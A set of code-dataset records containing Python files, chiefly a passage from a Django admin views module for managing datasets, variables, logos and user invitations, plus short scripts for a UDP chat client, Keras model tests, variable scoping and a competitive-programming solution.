sql_query = 'SELECT `value`, `year`, data_values.`fk_var_id` as var_id, entities.id as entity_id, ' \\\n 'entities.name as entity_name from data_values ' \\\n 'join entities on data_values.`fk_ent_id` = entities.`id` WHERE ' \\\n 'data_values.`fk_var_id` in (%s) ORDER BY entity_name, year, fk_var_id;' % id_tuple\n\n with connection.cursor() as cursor:\n cursor.execute(sql_query)\n rows = cursor.fetchall()\n\n def stream():\n\n buffer_ = StringIO()\n writer = csv.writer(buffer_)\n writer.writerow(headerlist)\n current_row = None\n\n for row in rows:\n if not current_row or current_row[0] != row[4] or current_row[1] != row[1]:\n if current_row:\n writer.writerow(current_row)\n buffer_.seek(0)\n data = buffer_.read()\n buffer_.seek(0)\n buffer_.truncate()\n yield data\n\n current_row = [row[4], row[1]]\n for i in range(0, len(varlist)):\n current_row.append(\"\")\n\n theindex = 2 + varlist.index(row[2])\n current_row[theindex] = row[0]\n writer.writerow(current_row)\n buffer_.seek(0)\n data = buffer_.read()\n buffer_.seek(0)\n buffer_.truncate()\n yield data\n\n response = StreamingHttpResponse(\n stream(), content_type='text/csv'\n )\n ascii_filename = unidecode(dataset.name)\n disposition = \"attachment; filename='%s.csv'\" % ascii_filename\n response['Content-Disposition'] = disposition\n response['Cache-Control'] = 'public, max-age=0, s-maxage=604800'\n return response\n\n\ndef dataset_json(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n data = {'name': dataset.name, 'description': dataset.description, 'categoryId': dataset.fk_dst_cat_id.pk,\n 'subcategoryId': dataset.fk_dst_subcat_id.pk, 'variables': []}\n\n allchart_dimensions = ChartDimension.objects.all().values('chartId', 'variableId')\n var_to_chart = {}\n for each in allchart_dimensions:\n if var_to_chart.get(each['variableId'], 0):\n var_to_chart[each['variableId']].append(each['chartId'])\n else:\n var_to_chart[each['variableId']] = []\n var_to_chart[each['variableId']].append(each['chartId'])\n\n allvariables = Variable.objects.all().select_related('sourceId')\n\n for var in allvariables:\n if var.fk_dst_id == dataset:\n\n sourcedata = {\n 'id': var.sourceId.pk,\n 'name': var.sourceId.name,\n 'description': var.sourceId.description\n }\n\n chartdata = []\n\n for onechart in var_to_chart.get(var.pk, []):\n chart = Chart.objects.get(pk=onechart)\n chartdata.append({\n 'id': chart.pk,\n 'name': chart.name\n })\n\n vardata = {\n 'id': var.pk,\n 'name': var.name,\n 'unit': var.unit,\n 'description': var.description,\n 'coverage': var.coverage,\n 'timespan': var.timespan,\n 'source': sourcedata,\n 'charts': chartdata\n }\n\n data['variables'].append(vardata)\n\n return JsonResponse(data, safe=False)\n\n\ndef check_invitation_statuses():\n invites = UserInvitation.objects.filter(status='pending')\n for each in invites:\n if each.valid_till <= timezone.now():\n each.status = 'expired'\n each.save()\n\n\ndef listcategories(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n return render(request, 'admin.categories.html', context={'current_user': request.user.name,\n 'categories': categories\n })\n\n\ndef showcategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n catobj = DatasetCategory.objects.get(pk=int(catid))\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n subcategories = DatasetSubcategory.objects.filter(fk_dst_cat_id=catobj).values()\n\n category['subcategories'] = subcategories\n\n return render(request, 'admin.categories.show.html', context={'current_user': request.user.name,\n 'category': category\n })\n\n\ndef managecategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n DatasetCategory.objects.filter(pk=catid).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Category updated!')\n return HttpResponseRedirect(reverse('showcategory', args=[catid]))\n if request_dict['_method'] == 'DELETE':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n category = DatasetCategory.objects.get(pk=int(catid))\n subcategory = DatasetSubcategory.objects.filter(fk_dst_cat_id=category)\n try:\n for each in subcategory:\n each.delete()\n category.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editcategory', args=[catid]))\n messages.success(request, 'Category deleted!')\n return HttpResponseRedirect(reverse('listcategories'))\n\n\ndef editcategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n return render(request, 'admin.categories.edit.html', context={'current_user': request.user.name,\n 'category': category\n })\n\n\ndef listvariables(request: HttpRequest):\n variables = Variable.objects.values()\n\n return render(request, 'admin.variables.html', context={'current_user': request.user.name,\n 'variables': variables\n })\n\n\ndef showvariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n items_per_page = 50\n\n chart_dims = list(ChartDimension.objects.filter(variableId=variable).values('chartId'))\n chart_id_list = []\n for each in chart_dims:\n chart_id_list.append(each['chartId'])\n charts = list(Chart.objects.filter(pk__in=chart_id_list).values('name', 'id'))\n\n variable_dict = {}\n variable_dict['name'] = variable.name\n variable_dict['id'] = variable.pk\n variable_dict['unit'] = variable.unit\n variable_dict['description'] = variable.description\n variable_dict['dataset'] = {'name': variable.fk_dst_id.name, 'id': variable.fk_dst_id.pk}\n variable_dict['source'] = {'name': variable.sourceId.name, 'id': variable.sourceId.pk}\n variable_dict['charts'] = charts\n\n request_dict = get_query_as_dict(request)\n if request_dict.get('search', [0])[0]:\n value_query = request_dict.get('value', [''])[0]\n year_query = request_dict.get('year', [None])[0]\n entity_query = request_dict.get('name', [''])[0]\n try:\n year_query = int(year_query)\n except ValueError:\n year_query = 0\n except TypeError:\n year_query = 0\n\n values = DataValue.objects.filter(fk_var_id=variable)\n if value_query:\n values = values.filter(value=value_query)\n if year_query:\n values = values.filter(year=year_query)\n if entity_query:\n values = values.filter(fk_ent_id__name=entity_query)\n\n else:\n values = DataValue.objects.filter(fk_var_id=variable)\n\n values = list(values.values('pk', 'value', 'year', 'fk_ent_id__name'))\n\n total_rows = len(values)\n total_pages = -(-len(values) // items_per_page)\n page_number = get_query_as_dict(request).get('page', [0])\n\n try:\n page_number = int(page_number[0])\n except ValueError:\n page_number = 0\n\n if page_number > 1:\n vals = values[(page_number - 1) * items_per_page:page_number * items_per_page]\n else:\n vals = values[:items_per_page]\n\n if vals:\n if total_pages >= 13:\n if page_number < 7:\n nav_pages = [1, 2, 3, 4, 5, 6, 7, 8, '#', total_pages - 1, total_pages]\n elif page_number > total_pages - 5:\n nav_pages = [1, 2, '#', total_pages - 7, total_pages - 6, total_pages - 5, total_pages - 4,\n total_pages - 3,\n total_pages - 2, total_pages - 1, total_pages]\n else:\n nav_pages = [1, 2, '#', page_number - 3, page_number - 2, page_number - 1, page_number,\n page_number + 1,\n page_number + 2, page_number + 3, '#', total_pages - 1, total_pages]\n else:\n nav_pages = [n for n in range(1, total_pages + 1)]\n else:\n nav_pages = []\n\n variable_dict['values'] = vals\n\n allentities = []\n for each in values:\n if each['fk_ent_id__name'] not in allentities:\n allentities.append(each['fk_ent_id__name'])\n\n request_string_for_pages = '?'\n for key, value in request_dict.items():\n if key != 'page':\n request_string_for_pages += key + '=' + value[0] + '&'\n\n return render(request, 'admin.variables.show.html', context={'current_user': request.user.name,\n 'variable': variable_dict,\n 'nav_pages': nav_pages,\n 'current_page': page_number,\n 'total_rows': total_rows,\n 'entities': allentities,\n 'page_request_string': request_string_for_pages\n })\n\n\ndef editvariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n variable_dict = {\n 'name': variable.name,\n 'id': variable.pk,\n 'unit': variable.unit,\n 'coverage': variable.coverage,\n 'timespan': variable.timespan,\n 'description': variable.description,\n 'source': {'id': variable.sourceId.pk, 'name': variable.sourceId.name}\n }\n\n return render(request, 'admin.variables.edit.html', context={'current_user': request.user.name,\n 'variable': variable_dict\n })\n\n\ndef managevariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n variable.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n messages.success(request, 'Variable deleted.')\n return HttpResponseRedirect(reverse('listvariables'))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n request_dict.pop('sourceId', None)\n Variable.objects.filter(pk=int(variableid)).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Variable updated!')\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n\n\ndef listlicenses(request: HttpRequest):\n licenses = License.objects.values()\n return render(request, 'admin.licenses.html', context={'current_user': request.user.name,\n 'licenses': licenses\n })\n\n\ndef showlicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n return render(request, 'admin.licenses.show.html', context={'current_user': request.user.name,\n 'license': license\n })\n\n\ndef editlicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n license = {\n 'id': license.pk,\n 'name': license.name,\n 'description': license.description\n }\n\n return render(request, 'admin.licenses.edit.html', context={'current_user': request.user.name,\n 'license': license\n })\n\n\ndef managelicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n License.objects.filter(pk=int(licenseid)).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'License updated!')\n return HttpResponseRedirect(reverse('showlicense', args=[licenseid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showlicense', args=[licenseid]))\n\n\ndef listlogos(request: HttpRequest):\n logos = Logo.objects.values()\n return render(request, 'admin.logos.html', context={'current_user': request.user.name,\n 'logos': logos\n })\n\n\ndef createlogo(request: HttpRequest):\n return render(request, 'admin.logos.create.html', context={'current_user': request.user.name})\n\n\ndef storelogo(request: HttpRequest):\n\n if request.method == 'POST':\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if not request.FILES.get('image', 0):\n messages.error(request, 'Image field should not be empty.')\n if messages.get_messages(request):\n return HttpResponseRedirect(reverse('createlogo'))\n svg = request.FILES['image'].read()\n logo = Logo(name=request.POST['name'], svg=svg)\n logo.save()\n messages.success(request, 'Logo created!')\n return HttpResponseRedirect(reverse('listlogos'))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('listlogos'))\n\n\ndef showlogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n logo = {\n 'id': logo.pk,\n 'name': logo.name,\n 'svg': logo.svg\n }\n\n return render(request, 'admin.logos.show.html', context={'current_user': request.user.name,\n 'logo': logo})\n\n\ndef editlogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n logo = {\n 'id': logo.pk,\n 'name': logo.name\n }\n\n return render(request, 'admin.logos.edit.html', context={'current_user': request.user.name,\n 'logo': logo})\n\n\ndef managelogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n if request.method == 'POST':\n if request.POST.get('_method', '') == 'PATCH':\n image_no_change = 0\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if not request.FILES.get('image', 0):\n image_no_change = 1\n if messages.get_messages(request):\n return HttpResponseRedirect(reverse('editlogo', args=[logoid]))\n if not image_no_change:\n svg = request.FILES['image'].read()\n logo.name = request.POST['name']\n logo.svg = svg\n else:\n logo.name = request.POST['name']\n logo.save()\n messages.success(request, 'Logo updated!')\n return HttpResponseRedirect(reverse('showlogo', args=[logoid]))\n if request.POST.get('_method', '') == 'DELETE':\n logo.delete()\n messages.success(request, 'Logo deleted!')\n return HttpResponseRedirect(reverse('listlogos'))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showlogo', args=[logoid]))\n\n\ndef listsources(request: HttpRequest):\n\n datasets = Dataset.objects.all()\n variables = Variable.objects.all()\n sources = Source.objects.all().order_by('name')\n\n source_var_dict: Dict = {}\n dataset_dict: Dict = {}\n\n for each in datasets:\n dataset_dict[each.pk] = {'id': each.pk, 'name': each.name}\n\n for each in variables:\n if not source_var_dict.get(each.sourceId.pk, 0):\n source_var_dict[each.sourceId.pk] = []\n source_var_dict[each.sourceId.pk].append({\n 'id': each.pk,\n 'name': each.name\n })\n else:\n source_var_dict[each.sourceId.pk].append({\n 'id': each.pk,\n 'name': each.name\n })\n\n sources_list = []\n\n for each in sources:\n sources_list.append({'id': each.pk, 'name': each.name,\n 'dataset': dataset_dict.get(each.datasetId, None),\n 'variables': source_var_dict.get(each.pk, [])})\n\n return render(request, 'admin.sources.html', context={'current_user': request.user.name,\n 'sources': sources_list})\n\n\ndef showsource(request: HttpRequest, sourceid: str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n source = {'id': source.pk, 'name': source.name, 'description': source.description}\n\n try:\n dataset = Dataset.objects.get(pk=source['id'])\n source['dataset'] = {'id': dataset.pk, 'name': dataset.name}\n except:\n source['dataset'] = None\n\n variables = Variable.objects.filter(sourceId__pk=source['id']).values()\n\n source['variables'] = variables\n\n return render(request, 'admin.sources.show.html', context={'current_user': request.user.name,\n 'source': source})\n\n\ndef editsource(request: HttpRequest, sourceid: str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n source = {\n 'id': source.pk,\n 'name': source.name,\n 'description': source.description\n }\n\n return render(request, 'admin.sources.edit.html', context={'current_user': request.user.name,\n 'source': source})\n\n\ndef managesource(request: HttpRequest, sourceid: str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n try:\n Source.objects.filter(pk=int(sourceid)).update(updated_at=timezone.now(), **request_dict)\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n messages.success(request, 'Source updated!')\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n\n\ndef editsourcetemplate(request: HttpRequest):\n sourcetemplate = Setting.objects.filter(meta_name='sourceTemplate').first()\n\n if request.method == 'GET':\n\n sourcetemplate = {'meta_value': sourcetemplate.meta_value}\n\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n if request.method == 'POST':\n if not request.POST.get('source_template', 0):\n messages.error(request, 'Source template field should not be empty.')\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n else:\n sourcetemplate.meta_value = request.POST['source_template']\n sourcetemplate.save()\n messages.success(request, 'Source template updated.')\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n\n\ndef editsubcategory(request: HttpRequest, subcatid: str):\n try:\n subcat = DatasetSubcategory.objects.get(pk=int(subcatid))\n except DatasetSubcategory.DoesNotExist:\n return HttpResponseNotFound('Subcategory does not exist!')\n\n subcategory = {'id': subcat.pk, 'name': subcat.name, 'category': subcat.fk_dst_cat_id.pk}\n categories = DatasetCategory.objects.values()\n category = {'id': subcat.fk_dst_cat_id.pk}\n\n return render(request, 'admin.subcategories.edit.html', context={'current_user': request.user.name,\n 'subcategory': subcategory,\n 'categories': categories,\n 'category': category})\n\n\ndef managesubcategory(request: HttpRequest, subcatid: str):\n try:\n subcat = DatasetSubcategory.objects.get(pk=int(subcatid))\n except DatasetSubcategory.DoesNotExist:\n return HttpResponseNotFound('Subcategory does not exist!')\n\n parent_cat = subcat.fk_dst_cat_id.pk\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n subcat.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editsubcategory', args=[subcatid]))\n messages.success(request, 'Subcategory deleted.')\n return HttpResponseRedirect(reverse('showcategory', args=[parent_cat]))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n try:\n DatasetSubcategory.objects.filter(pk=int(subcatid)).update(updated_at=timezone.now(), **request_dict)\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editsubcategory', args=[subcatid]))\n messages.success(request, 'Subcategory updated!')\n return HttpResponseRedirect(reverse('showcategory', args=[parent_cat]))\n\n\ndef createsubcategory(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n return render(request, 'admin.subcategories.create.html',context={'current_user': request.user.name,\n 'categories': categories\n })\n\n\ndef storesubcategory(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n if request.method == 'POST':\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if messages.get_messages(request):\n return render(request, 'admin.subcategories.create.html',\n context={'current_user': request.user.name,\n 'categories': categories})\n subcat = DatasetSubcategory()\n subcat.name = request.POST['name']\n subcat.fk_dst_cat_id = DatasetCategory.objects.get(pk=int(request.POST['fk_dst_cat_id']))\n subcat.save()\n messages.success(request, 'Subcategory created!')\n return HttpResponseRedirect(reverse('listcategories'))\n\n\ndef listusers(request: HttpRequest):\n check_invitation_statuses()\n users = User.objects.all().order_by('created_at')\n userlist = []\n\n for each in users:\n userlist.append({'name': each.name, 'created_at': each.created_at})\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(userlist, safe=False)\n else:\n return render(request, 'admin.users.html', context={'current_user': request.user.name,\n 'users': userlist\n })\n\n\ndef invite_user(request: HttpRequest):\n if request.method == 'GET':\n if not request.user.is_superuser:\n return HttpResponse('Permission denied!')\n else:\n form = InviteUserForm()\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name})\n if request.method == 'POST':\n if not request.user.is_superuser:\n return HttpResponse('Permission denied!')\n else:\n form = InviteUserForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n name = form.cleaned_data['name']\n try:\n newuser = User.objects.get(email=email)\n messages.error(request, 'The user you are inviting is registered in the system.')\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name})\n except User.DoesNotExist:\n pass\n try:\n newuser = User.objects.get(name=name)\n messages.error(request, 'The user with that name is registered in the system.')\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name})\n except User.DoesNotExist:\n pass\n newuser = User()\n newuser.email = email\n newuser.name = name\n newuser.is_active = False\n newuser.is_superuser = False\n newuser.save()\n invitation = UserInvitation()\n invitation.code = get_random_string(length=40)\n invitation.email = newuser.email\n invitation.user_id = newuser\n invitation.status = 'pending'\n invitation.valid_till = timezone.now() + datetime.timedelta(days=2)\n invitation.save()\n newuser.email_user('Invitation to join OWID',\n 'Hi %s, please follow this link in order '\n 'to register on owid-grapher: %s' %\n (newuser.name, request.build_absolute_uri(reverse('registerbyinvite', args=[invitation.code]))),\n 'no-reply@ourworldindata.org')\n messages.success(request, 'The invite was sent successfully.')\n return render(request, 'admin.invite_user.html', context={'form': InviteUserForm(),\n 'current_user': request.user.name, })\n else:\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name, })\n\n\ndef register_by_invite(request: HttpRequest, code: str):\n check_invitation_statuses()\n try:\n invite = UserInvitation.objects.get(code=code)\n except UserInvitation.DoesNotExist:\n return HttpResponseNotFound('Your invitation code does not exist in the system.')\n invited_user = invite.user_id\n\n if request.method == 'GET':\n if invite.status == 'successful':\n return HttpResponse('Your invitation code has already been used.')\n if invite.status == 'expired':\n return HttpResponse('Your invitation code has expired.')\n if invite.status == 'cancelled':\n return HttpResponse('Your invitation code has been cancelled.')\n form = InvitedUserRegisterForm(data={'name': invited_user.name})\n return render(request, 'register_invited_user.html', context={'form': form})\n if request.method == 'POST':\n form = InvitedUserRegisterForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n try:\n newuser = User.objects.get(name=name)\n if newuser != invited_user:\n messages.error(request, 'The username you chose is not available. Please choose another username.')\n return render(request, 'register_invited_user.html', context={'form': form})\n except User.DoesNotExist:\n pass\n if form.cleaned_data['password1'] == form.cleaned_data['password2']:\n newuser.name = name\n newuser.set_password(form.cleaned_data['password1'])\n newuser.is_active = True\n newuser.save()\n invite.status = 'successful'\n invite.save()\n return HttpResponseRedirect(reverse(\"login\"))\n else:\n messages.error(request, \"Passwords don't match!\")\n return render(request, 'register_invited_user.html', context={'form': form})\n else:\n return render(request, 'register_invited_user.html', context={'form': form})\n","sub_path":"grapher_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":60781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"593928984","text":"import socket\n\nsk = socket.socket(type=socket.SOCK_DGRAM)\nip_port = ('127.0.0.1', 8080)\n\nwhile True:\n info = input('二哥说: ').encode('utf-8')\n info = '\\033[34m来自二哥的消息: %s\\033[0m' % info\n sk.sendto(info.encode('utf-8'), ip_port)\n msg, addr = sk.recvfrom(1024)\n print(msg.decode('utf-8'))\nsk.close()","sub_path":"day31/demo3_udpqq/client2.py","file_name":"client2.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"131184267","text":"'''\nCreate a simple ConvNet for testing Keras model import. Run\nKeras mnist_cnn.py example and then save that model and its\noutputs to disk.\n'''\nfrom __future__ import print_function\n\nimport imp\nimport keras.backend as K\nfrom util import save_model_details, save_model_output\n\nSCRIPT_PATH = '../examples/mnist_cnn.py'\nKERAS_VERSION = '_keras_2'\nPREFIX = 'mnist_cnn_' + K.image_dim_ordering() + KERAS_VERSION\nOUT_DIR = '.'\n\nprint('Entering Keras script')\nexample = imp.load_source('example', SCRIPT_PATH)\n\nprint('Saving model details')\nsave_model_details(example.model, prefix=PREFIX, out_dir=OUT_DIR)\n\nprint('Saving model outputs')\nsave_model_output(example.model, example.X_test, example.Y_test, nb_examples=100, prefix=PREFIX, out_dir=OUT_DIR)\n\nprint('DONE!')\n","sub_path":"keras-tests/make_mnist_cnn_unit_test.py","file_name":"make_mnist_cnn_unit_test.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"53446658","text":"myglobalvar = 'global hello'\n\n\ndef variable_test():\n # Variable creation, must be initialized with value\n myvar = None\n print('myvar=%s' % myvar)\n\n # Variable can be deleted\n del myvar\n try:\n print('myvar=%s' % myvar)\n except NameError:\n print('myvar is no longer defined')\n\n\ndef global_variable_test1():\n print('global var can be read:', myglobalvar)\n\n\ndef global_variable_test2():\n global myglobalvar\n myglobalvar = 'updated global hello'\n print('global var can be changed:', myglobalvar)\n\n\ndef global_variable_test3():\n try:\n # Global var must be re-declared with global keyword in function before updating value, otherwise a new local\n # var is created, and previous reference will result in exception\n print('myglobalvar=%s' % myglobalvar)\n myglobalvar = 'updated global hello'\n except UnboundLocalError as e:\n print('Error trying to set globalvar:', e)\n\nvariable_test()\nglobal_variable_test1()\nglobal_variable_test2()\nglobal_variable_test3()\n\n","sub_path":"pythonbasic/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111404447","text":"import timeit\nstart = timeit.default_timer()\n\nlibTable = []\nbusy = 0\nbooksProcessed = set()\n\ndef solution(books, libs, days, scores, libDetails, libBooks):\n global libTable, busy\n\n for iL in range(libs):\n libTable.append([iL, False, libDetails[iL][1], 0, set()])\n\n #main processing\n for currday in range(days):\n\n for iL in range(libs):\n if libTable[iL][2] > 0 and libTable[iL][1] == True:\n #print(libTable[iL])\n libTable[iL][2] -= 1\n\n if busy > 0:\n busy -= 1\n \n if busy == 0:\n iL = findBestLib(libDetails, currday, days)\n\n if iL is not None:\n libTable[iL][1] = True\n busy = libDetails[iL][1]\n\n clearBestLibBooksFromOtherLibs(iL, libBooks)\n\n for iL in range(libs):\n if libTable[iL][2] == 0 and libTable[iL][1] == True:\n for ibpd in range(libDetails[iL][2]):\n bestBook = findBestBook(libBooks[iL], scores)\n\n if bestBook is not None:\n booksProcessed.add(bestBook)\n libTable[iL][3] += 1\n libTable[iL][4].add(bestBook)\n #clearScannedBookFromAllLibs(bestBook, libBooks)\n libBooks[iL].discard(bestBook)\n \n print(currday)\n write_file(libBooks, \"temp.out\")\n\n #format final output\n libCount = 0\n for iL in range(libs):\n if libTable[iL][3] > 0:\n libCount += 1\n\n final = []\n final.append([libCount])\n\n for iL in range(libs):\n if libTable[iL][3] > 0:\n final.append([iL, libTable[iL][3]])\n final.append(libTable[iL][4])\n\n #print(final)\n return final\n\n\ndef clearScannedBookFromAllLibs(scannedBook, libBooks):\n\n for books in libBooks:\n books.discard(scannedBook)\n\n\ndef clearBestLibBooksFromOtherLibs(myLibId, libBooks):\n\n for myLibBook in libBooks[myLibId]:\n for iL, books in enumerate(libBooks):\n if iL != myLibId:\n books.discard(myLibBook)\n \n\ndef findBestBook(books, scores):\n global booksProcessed\n\n maxBookPoint = 0\n bestBookId = None\n\n for book in books:\n if True: #book not in booksProcessed:\n if maxBookPoint <= scores[book]:\n maxBookPoint = scores[book]\n bestBookId = book\n\n return bestBookId\n\n\ndef findBestLib(libDetails, currday, days):\n global libTable, busy\n minSignupDays = days\n bestLibIndex = None\n\n for iL, libDetail in enumerate(libDetails):\n if (libTable[iL][1] == False):\n if minSignupDays >= libDetail[1]:\n minSignupDays = libDetail[1]\n bestLibIndex = iL\n\n return bestLibIndex\n\n\ndef read_file(filename):\n \"\"\"Reading input file.\"\"\"\n\n with open(filename, 'r') as fin:\n line = fin.readline()\n books, libs, days = [int(num) for num in line.split()]\n\n line = fin.readline()\n scores = tuple([int(num) for num in line.split()])\n\n libDetails = []\n libBooks = []\n for i in range(0, libs * 2, 2):\n line = fin.readline()\n libDetails.append(tuple([int(num) for num in line.split()]))\n\n line = fin.readline()\n libBooks.append(set([int(num) for num in line.split()]))\n\n return books, libs, days, scores, libDetails, libBooks\n\n\ndef write_file(grid, filename):\n \"\"\"Write output file.\"\"\"\n with open(filename, 'w') as fout:\n for v in grid:\n fout.write(\" \".join(\"\" + str(r) + \"\" for r in v) + '\\n')\n\n\ndef main():\n \"\"\"Main function\"\"\"\n filename = \"b_read_on.txt\"\n\n print('Running on file: %s' % filename)\n\n # read input file\n books, libs, days, scores, libDetails, libBooks = read_file(filename)\n try:\n grid_out = solution(books, libs, days, scores, libDetails, libBooks)\n except KeyboardInterrupt:\n pass\n\n # write output file\n write_file(grid_out, \"b.out\")\n print(\"finish\")\n\n\nif __name__ == '__main__':\n main()\n\nprint('Time:', round(timeit.default_timer() - start, 5), \"seconds.\")\n","sub_path":"HC_2020/Qualification_Round/main - b.py","file_name":"main - b.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71656808","text":"'''\r\nCreated on 22 de dic. de 2016\r\n\r\n@author: DarioRG\r\n'''\r\nimport configparser\r\n\r\n\r\ndef get_url_from_city(city):\r\n ''' Method that loads the url for the parameter city from the configuration file'''\r\n \r\n parser = configparser.SafeConfigParser()\r\n parser.read('maps/processing/url_mapping.ini')\r\n \r\n try:\r\n url = parser['url_mapping'][city]\r\n except Exception:\r\n raise Exception('Error al cargar la url para los datos de: ' + city)\r\n \r\n return url","sub_path":"maps/processing/load_data_url.py","file_name":"load_data_url.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"506122074","text":"# -----------\n# User Instructions:\n#\n# Modify the the search function so that it returns\n# a shortest path as follows:\n# \n# [['>', 'v', ' ', ' ', ' ', ' '],\n# [' ', '>', '>', '>', '>', 'v'],\n# [' ', ' ', ' ', ' ', ' ', 'v'],\n# [' ', ' ', ' 